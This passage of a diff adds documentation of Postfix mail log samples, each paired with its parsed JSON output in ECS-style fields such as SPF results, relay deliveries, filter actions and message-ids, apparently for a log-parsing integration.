dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.localdomain", + "domain": "example.localdomain", + "subdomain": "example" + }, + "email": { + "to": { + "address": [ + "proxy@example.localdomain" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "sample.orig.to" + }, + "related": { + "hosts": [ + "example.localdomain" + ] + } + } + + ``` + + +=== "wo_appname_local6.json" + + ```json + + { + "message": "04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "ip": "127.0.0.1", + "port": 2525, + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "john.doe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "jane.doe@example.com" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_message_id.json" + + ```json + + { + "message": "476295F5AD: message-id=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "aaaaaaaaaa=@pm.me" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_message_id2.json" + + ```json + + { + "message": "123456789: message-id=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "foo@corp.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_noqueue.json" + + ```json + + { + "message": "NOQUEUE: filter: RCPT from foo.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 294", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "filter", + "outcome": "success", + "target": "network-traffic", + "type": "RCPT" + }, + "destination": { + "address": "othercorp.com", + "domain": "othercorp.com", + "registered_domain": "othercorp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "foo.bar@subdomain.corp.com" + ] + }, + "to": { + "address": [ + "firstname.lastname@othercorp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "foo.key.corp.com", + "othercorp.com" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "foo.key.corp.com", + "domain": "foo.key.corp.com", + "ip": "192.168.1.1", + "registered_domain": "corp.com", + "subdomain": "foo.key", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_noqueue2.json" + + ```json + + { + "message": "NOQUEUE: filter: RCPT from HOSTNAME.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 299", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "filter", + "outcome": "success", + "target": "network-traffic", + "type": "RCPT" + }, + "destination": { + "address": "corp2.com", + "domain": "corp2.com", + "registered_domain": "corp2.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "firstname.firstname@subdomain.corp.com" + ] + }, + "to": { + "address": [ + "firstname.lastname@corp2.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "HOSTNAME.key.corp.com", + "corp2.com" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "HOSTNAME.key.corp.com", + "domain": "HOSTNAME.key.corp.com", + "ip": "192.168.1.1", + "registered_domain": "corp.com", + "subdomain": "HOSTNAME.key", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_nospam.json" + + ```json + + { + "message": "Anonymous TLS connection established to example.org[1.2.3.4]:25: TLSv1.2 with cipher ADH-AES256-GCM-SHA384 (256/256 bits)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.2.3.4", + "domain": "example.org", + "ip": "1.2.3.4", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "wo_appname_pass.json" + + ```json + + { + "message": "action=pass, reason=triplet found, delay=2400, client_name=mordor.com, client_address=1.1.1.1, sender=mechant@mordor.com, recipient=Pipin.touque@lacomte.net", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "triplet found", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "triplet found", + "target": "network-traffic" + }, + "destination": { + "address": "lacomte.net", + "domain": "lacomte.net", + "registered_domain": "lacomte.net", + "top_level_domain": "net" + }, + "email": { + "from": { + "address": [ + "mechant@mordor.com" + ] + }, + "to": { + "address": [ + "Pipin.touque@lacomte.net" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "lacomte.net", + "mordor.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mordor.com", + "domain": "mordor.com", + "ip": "1.1.1.1", + "registered_domain": "mordor.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_pass2.json" + + ```json + + { + "message": "action=pass, reason=client AAA, client_name=example.com, client_address=1.2.3.4, sender=Coyotte@acme.com, recipient=BIPBIP.NEWMAN@acme.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client AAA", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client AAA", + "target": "network-traffic" + }, + "destination": { + "address": "acme.com", + "domain": "acme.com", + "registered_domain": "acme.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "Coyotte@acme.com" + ] + }, + "to": { + "address": [ + "BIPBIP.NEWMAN@acme.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "acme.com", + "example.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.com", + "domain": "example.com", + "ip": "1.2.3.4", + "registered_domain": "example.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_pickup1.json" + + ```json + + { + "message": "E43D43F838: uid=117 from=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "no-reply@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_pipe1.json" + + ```json + + { + "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_pipe2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_pipe3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_policydspf1.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=ops@corp.com; receiver= Reject action: 550 5.7.23 210", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "ops@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "corp.com", + "domain": "corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf10.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=<>; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": "example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf11.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.com; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "noreply@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf12.json" + + ```json + + { + "message": "Neutral; identity=mailfrom; client-ip=1.2.3.4; helo=example.mail.protection.outlook.com; envelope-from=john.doem@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Neutral", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "john.doem@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.mail.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.mail.protection.outlook.com", + "domain": "example.mail.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.mail.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf13.json" + + ```json + + { + "message": "None; identity=helo; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf14.json" + + ```json + + { + "message": "Pass; identity=helo; client-ip=1.2.3.4; helo=mail.example.org; envelope-from=<>; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mail.example.org", + "domain": "mail.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mail", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf15.json" + + ```json + + { + "message": "Pass; identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": "example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf16.json" + + ```json + + { + "message": "Permerror; identity=helo; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf17.json" + + ```json + + { + "message": "Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf18.json" + + ```json + + { + "message": "Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=no-reply@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "no-reply@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf19.json" + + ```json + + { + "message": "Softfail; identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Softfail", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "noreply@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf2.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=mx.example.com; envelope-from=prvs=30447fe13=no-reply@example.com; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "prvs=30447fe13=no-reply@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.com", + "domain": "mx.example.com", + "ip": "1.2.3.4", + "registered_domain": "example.com", + "subdomain": "mx", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf20.json" + + ```json + + { + "message": "prepend Received-SPF: Fail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf21.json" + + ```json + + { + "message": "prepend Received-SPF: Neutral (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf22.json" + + ```json + + { + "message": "prepend Received-SPF: None (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf23.json" + + ```json + + { + "message": "prepend Received-SPF: None (no SPF record) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf24.json" + + ```json + + { + "message": "prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf25.json" + + ```json + + { + "message": "prepend Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf26.json" + + ```json + + { + "message": "prepend Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf27.json" + + ```json + + { + "message": "prepend Received-SPF: Softfail (domain owner discourages use of this host) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf28.json" + + ```json + + { + "message": "prepend Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf3.json" + + ```json + + { + "message": "Action: prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=11.22.33.44; helo=mta-11-22-33-44.example.or; envelope-from=doe@newsletter.example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "doe@newsletter.example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mta-11-22-33-44.example.or" + ], + "ip": [ + "11.22.33.44" + ] + }, + "source": { + "address": "mta-11-22-33-44.example.or", + "domain": "mta-11-22-33-44.example.or", + "ip": "11.22.33.44", + "subdomain": "mta-11-22-33-44.example" + } + } + + ``` + + +=== "wo_appname_policydspf4.json" + + ```json + + { + "message": "Pass; identity=mailfrom; client-ip=1.1.1.1; helo=mail.corp.com; envelope-from=username@corp.com; receiver= 131", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.corp.com", + "domain": "mail.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "mail", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf5.json" + + ```json + + { + "message": "None; identity=helo; client-ip=1.1.1.1; helo=sub.corp.com; envelope-from=noreply@corp.com; receiver= 128", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "noreply@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "sub.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "sub.corp.com", + "domain": "sub.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "sub", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf6.json" + + ```json + + { + "message": "Softfail; identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=username@corp.com; receiver= 120", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Softfail", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "corp.com", + "domain": "corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf7.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: None (mailfrom) identity=mailfrom; client-ip=2.3.4.5; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "2.3.4.5" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "2.3.4.5" + } + } + + ``` + + +=== "wo_appname_policydspf8.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: None (no SPF record) identity=helo; client-ip=2.3.4.5; helo=posta.example.org; envelope-from=<>; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "posta.example.org" + ], + "ip": [ + "2.3.4.5" + ] + }, + "source": { + "address": "posta.example.org", + "domain": "posta.example.org", + "ip": "2.3.4.5", + "registered_domain": "example.org", + "subdomain": "posta", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf9.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": "example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_postfix1.json" + + ```json + + { + "message": "7B082110A6E0: host smtp.office365.com[40.101.136.242] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "40.101.136.242", + "domain": "smtp.office365.com", + "ip": "40.101.136.242" + }, + "network": { + 